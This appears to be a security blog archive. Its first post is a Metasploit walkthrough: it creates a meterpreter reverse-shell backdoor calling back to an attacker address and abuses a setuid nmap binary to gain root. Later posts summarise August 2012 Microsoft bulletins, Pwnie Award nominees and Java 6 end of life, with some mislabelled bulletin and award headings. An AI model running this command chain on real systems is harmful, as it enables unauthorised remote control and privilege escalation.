Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.
Commands :
You will require to have an active session on the target, this session could be done through a backdoor.
sudo msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.178.100 X > backdoor
Upload the backdoor on the target
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j
sysinfo
getuid
use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
Microsoft has release, the 14 August 2012, during his August Patch Tuesday, two security advisories and nine security bulletins. On the nine security bulletins six of them have a Critical security rating.
Microsoft Security Advisory 2661254
MSA-2661254 is the suite of the Flame malware attacks consequences. Microsoft allow the usage restriction of certificates with RSA keys less than 1024 bits in length. This MSA will be pushed as a security update during October 2012 Patch Tuesday, so you have two months to assess the impact of this update. We strongly recommend you to test this MSA before pushing it on all your Windows, KB-2661254 provide you known issues with this security update. For example, Internet Explorer will not allow access to a website that is secured by using an RSA certificate that has a key length of less than 1024 bits.
Microsoft Security Advisory 2737111
MSA-2737111 is dealing with vulnerabilities in third-party code, Oracle Outside In libraries, that affect Microsoft Exchange Server 2007, Microsoft Exchange Server 2010, and FAST Search Server 2010 for SharePoint. These Oracle vulnerabilities were patched during July 2012 Oracle quarterly patch cycle. MS12-058 security bulletin addresses this issue for Microsoft Exchange. Also, these Oracle Outside In vulnerabilities have been publicly disclosed.
MS12-052 – Cumulative Security Update for Internet Explorer
MS12-052security update, classified as Critical, allowing remote code execution, is the fix for four privately reported vulnerabilities. CVE-2012-1526 has a CVSS base score of 9.3 and was discovered and privately reported by GWSlabs. CVE-2012-2521 has a CVSS base score of 9.3 and was discovered and privately reported by Derek Soeder. CVE-2012-2522 has a CVSS base score of 9.3 and was discovered and privately reported by Sung-ting Tsai and Ming-Chieh Pan of Trend Micro. CVE-2012-2523 has a CVSS base score of 9.3 ans was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.
MS12-053 – Vulnerability in Remote Desktop Could Allow Remote Code Execution
MS12-053 security update, classified as Critical, allowing remote code execution, is fixing one vulnerability CVE-2012-2526. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Edward Torkington.
MS12-054 – Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
MS12-054 security update, classified as Critical, allowing remote code execution, is fixing four privately reported vulnerabilities. All these vulnerabilities were reported by Yamata Li. CVE-2012-1850 has a CVSS base score of 5.0. CVE-2012-1851, CVE-2012-1852 and CVE-2012-1853 have a CVSS base score of 10.0.
MS12-055 – Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege
MS12-055 security update, classified as Important, allowing elevation of privilege, is fixing one vulnerability CVE-2012-2527. This vulnerability has a CVSS base score of 7.2 and was discovered and privately reported by Matthew Jurczyk of Google Inc.
MS12-056 – Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution
MS12-056 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-2523. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.
MS12-057 – Vulnerability in Microsoft Office Could Allow Remote Code Execution
MS12-057 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-2524. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Andrei Costin.
MS12-058 – Vulnerabilities in Microsoft Exchange ServerWebReady Document Viewing Could Allow Remote Code Execution
MS12-049 security update, classified as Critical, allowing remote code execution, is fixing 13 vulnerabilities discovered in third-party code Oracle Outside In librairies. These vulnerabilities have been publicly disclosed.
MS12-059 – Vulnerability in Microsoft Visio Could Allow Remote Code Execution
MS12-059 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-1888. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Alexander Gavrun.
MS12-060 – Vulnerability in Windows Common Controls Could Allow Remote Code Execution
MS12-060 security update, classified as Critical, allowing remote code execution, is fixing one vulnerability CVE-2012-1856. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by an unknown security researcher.
The 6th edition of “The Pwnie Awards” will have its awards ceremony at the BlackHat USA conference in Las Vegas, the 25 July. Pwnie Awards celebrate the achievements and failures of security researchers and the security community.
In the 2012 edition they’re will be nine award categories:
Pwnie for Best Server-Side Bug
Pwnie for Best Client-Side Bug
Pwnie for Best Privilege Escalation Bug
Pwnie for Most Innovative Research
Pwnie for Lamest Vendor Response
Pwnie for Best Song
Pwnie for Most Epic FAIL
Pwnie for Epic Ownage
Nominees for these categories have been announced the 21 July. I will do a quick recap on the “Best Server-Side Bug“, “Best Client-Side Bug” and the “Best Privilege Escalation Bug“.
Pwnie for Best Server-Side Bug
Nominees for this category are listed here under. My vote will go to “WordPress Timthumb Plugin ‘timthumb’ Cache Directory Arbitrary File Upload Vulnerability” due to the impact of this vulnerability in term of number of botnets and owned servers.
This vulnerability was discovered and reported to Oracle by Joxean Koret in 2008. Oracle had announce, in April CPU, that the vulnerability were fixed, but after releasing details of the vulnerability Joxean Koret had discover that the vulnerability were not fixed at all. Here under a video demonstration of the MITM attack.
ProFTPD Response Pool Use-after-Free (CVE-2011-4130)
This vulnerability was discovered and reported by an anonymous researcher in October 2011 and patched in November 2011. The vulnerability allows remote attackers to execute arbitrary code. Authentication is required to exploit this vulnerability in order to have access to the ftp command set.
This vulnerability was discovered and reported to Oracle by Sergei Golubchik in April 2012. The vulnerability exploits a password bypass weakness in MySQL. Here under a video demonstration of the attack.
Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as botnet recruitment vector, and has now spread in multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs visitors, diffusion of spam and phishing campaign, DDoS, hack of other web sites (such as About.us domain name registrar), etc, etc. Some of these infected WordPress were controlled by well-known C&C servers used and shared by black hats from around the world.
Pwnie for Best Server-Side Bug
Nominees for this category are listed here under. My vote will go to “MS11-087: Unspecified win32k.sys TrueType font parsing engine vulnerability” cause this vulnerability demonstrate clearly that bad guys are always in advance.
This vulnerability was discovered by Charlie Miller of Accuvant Labs and corrected in iOS 5.0.1 release. This vulnerability is a code signing bypass that allows third-party apps to dynamically download and execute code and use this in his rogue app.
Pwnie for Best Privilege Escalation Bug
Nominees for this category are listed here under. My vote will go to “Xen Intel x64 SYSRET Privilege Escalation” cause this vulnerability has impacts tones of products and vendors.
This vulnerability was discovered and reported to vendor by Rafal Wojtczuk. Successful demonstration of this vulnerability was provided by fail0verflow the 2012-07-05. Here under a video demonstration of the attack.
Last release of Java SE 6, version 6 update 33(1.6.0_33-b03), was done the 12 Jun 2012 during quarterly Oracle Java CPU (Critical Patch Update). This CPU had fix 14 security vulnerabilities in previous JSE products versions 7, 6, 5 and 4. One of these vulnerabilities was CVE-2012-1723 how is actually used in Blackhole exploit kit.
Metasploit exploitation demonstration of CVE-2012-1723
Since few days you may have see a notification on you system asking you to update Java.
By getting details on the update you will see that Java SE 7 update 5 (1.7_5) is available and by installing this update your previous version of JSE will removed. However, if you wish to keep Java 6 you will need to update from the offline Java installer to the latest version of JSE, how is version 7 update 5. Hu ! What a choice, I have to update to version 7 or to update to version 7.
As you may know Java SE 6 will be no longer supported after November 2012. The last Java CPU update is planned for 2012, October 12. After November 2012, Oracle will no longer post updates of Java SE 6 to its public download sites. For enterprise customers, who need continued access to critical bug fixes and security fixes as well as general maintenance for Java SE 6 or older versions, long-term support is available through Oracle Java SE Support . But it seem through this forced Java SE update to version 7 that Java SE 6 update 33 was the last one.
So we are encouraging you to plan a mega release on your infrastructures, cause Java SE 6 seem to be officially dead !
